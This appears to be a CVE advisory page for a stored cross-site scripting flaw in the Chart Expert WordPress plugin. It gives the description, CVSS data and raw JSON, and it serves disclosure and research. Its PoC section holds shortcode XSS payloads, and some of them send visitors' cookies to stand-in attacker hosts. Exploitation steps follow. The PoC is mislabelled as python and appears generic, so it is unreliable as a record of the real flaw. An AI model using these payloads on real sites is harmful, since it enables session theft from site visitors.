Security Vulnerability Report
中文
CVE-2025-12753 CVSS 6.4 MEDIUM

CVE-2025-12753

Published: 2025-11-11 04:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Chart Expert plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'pmzez_chart' shortcode in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user supplied shortcode attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Chart Expert plugin for WordPress <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-12753 PoC - WordPress Chart Expert Stored XSS --> <!-- Payload: Inject malicious JavaScript via pmzez_chart shortcode --> <!-- Requires: Contributor-level WordPress account or higher --> <!-- Basic XSS via onerror attribute --> [pmzez_chart chart_id='1' onerror='alert(document.cookie)'] <!-- XSS via javascript: protocol in src attribute --> [pmzez_chart src='javascript:alert("XSS by Chart Expert")'] <!-- XSS via event handler in title attribute --> [pmzez_chart title='<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>'] <!-- Stored XSS payload - script executes when page is viewed --> [pmzez_chart data='{"test": "<script>fetch("https://evil.com/log?cookie="+btoa(document.cookie))</script>"}'] <!-- exploitation steps: 1. Login to WordPress with contributor or higher privileges 2. Create or edit a post/page 3. Insert the malicious shortcode 4. Save/publish the content 5. Any user viewing the page will execute the injected JavaScript -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12753", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:50.090", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Chart Expert plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'pmzez_chart' shortcode in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user supplied shortcode attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/chart-expert/tags/1.0/inc/shortcode.php#L1", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/chart-expert/tags/1.0/inc/shortcode.php#L95", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8ed413a9-bf1d-4564-b740-4c92ec2c2249?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.